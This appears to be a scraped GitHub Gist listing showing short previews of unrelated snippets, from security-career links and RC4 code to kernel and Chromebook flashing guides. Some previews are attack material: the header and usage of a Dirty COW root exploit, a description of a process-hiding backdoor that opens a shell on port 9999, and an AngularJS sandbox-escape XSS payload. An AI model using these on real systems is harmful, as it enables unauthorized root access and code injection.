- How to Build a Successful Information Security Career (Daniel Miessler)
- The First Steps to a Career in Information Security (Errata Security - Marisa Fagan)
- Hiring your first Security Professional (Peerlyst - Dawid Balut)
- How to Start a Career in Cyber security
- How to Get Into Information Security (ISC^2)
- https://www.isc2.org/how-to-get-into-information-security.aspx
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // g++ -lstdc++ -Wno-write-strings fetch.cpp -o fetch | |
| #ifdef _WIN32 // Windows | |
| #include <winsock2.h> | |
| #include <ws2tcpip.h> | |
| #define MSG_NOSIGNAL 0 | |
| #else // Linux + Mac | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <netinet/in.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * A PTRACE_POKEDATA variant of CVE-2016-5195 | |
| * should work on RHEL 5 & 6 | |
| * | |
| * (un)comment correct payload (x86 or x64)! | |
| * $ gcc -pthread c0w.c -o c0w | |
| * $ ./c0w | |
| * DirtyCow root privilege escalation | |
| * Backing up /usr/bin/passwd.. to /tmp/bak | |
| * mmap fa65a000 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # This script prints a simple one-liner memory-only backdoor agent which hides from ps. | |
| # It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite | |
| # and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the | |
| # process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre) | |
| template = """ | |
| import sys,re,pty,os,socket |
ncmiller
/ HOWTO_LinuxKernelQemu.md
Last active
April 1, 2025 09:44
How to build the Linux kernel and test changes locally in qemu
This is the process I followed on my Fedora 23 host machine to build a small/minimal vanilla Linux kernel and test in Qemu (based on this blog post). This will provide a safe sandbox in which to test kernel changes, and is generally faster than developing natively on the host machine. Qemu will boot the kernel image directly in the emulated system.
sudo dnf install ncurses-devel kernel-devel kernel-headers gcc gcc-c++ git qemu openssl-devel glibc-static
jeremybuis
/ angular.sandbox.escapes.md
Created
January 27, 2016 15:31
Angular Sandbox Escape Cheatsheet
#Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| robin verton, dec 2015 | |
| implementation of the RC4 algo | |
| */ | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <stdlib.h> | |
| #define N 256 // 2^8 |
No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.
Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.
- A Russian translation of this article can be found here, contributed by Timur Demin.
- A Turkish translation can be found here, contributed by agyild.
- There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.
jcs
/ asus c201.md
Last active
April 17, 2024 17:44
Disabling SPI write protection, reflashing, and unbricking an Asus Chromebook C201
####Disabling SPI write protection
Put the Chromebook in developer-mode:
- With machine powered off, hold down Esc and Refresh(F3) while hitting power button
- At warning prompt, hit Control+D, then Enter at prompt about enabling developer mode
- Machine will format itself
Now remove the write-protect screw to enable flashrom to flash new Coreboot/Libreboot.
Flip powered-off machine over and remove 8 philips-head screws. 2 are located under rubber feet.
Rottweiler
/ gist:44fe4461a4552acf303a
Last active
December 19, 2024 15:51
Heavily obfuscated UnConfuserEx tool
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| UnConfuserEx https://mega.nz/#!U1hxwQKb!7WFBSjrZgg8ieFp15K0RJW8rWuyMHZTO9bpCekhBQfY | |
| ConfuserExDupPopPatcher https://mega.nz/#!IkhHzZDS!vPYABdYJtuDIGJBHdKzwIqLajxugJaNlENWr5CWjNlo | |
| ConfuserExStringDecryptor https://mega.nz/#!plhxRJyY!Vq9eRS-gixC__q75860gDD8Tcm_ncOfCCCP_HQKguUM | |
| ConfuserExCallFixer https://mega.nz/#!0gZFlbwC!KFka_Kxe-GuU-d8COni91xmGPbiRnbX6lBLYAomn7No | |
| I'm not responsible for what you do with these -- they may very well be backdoored |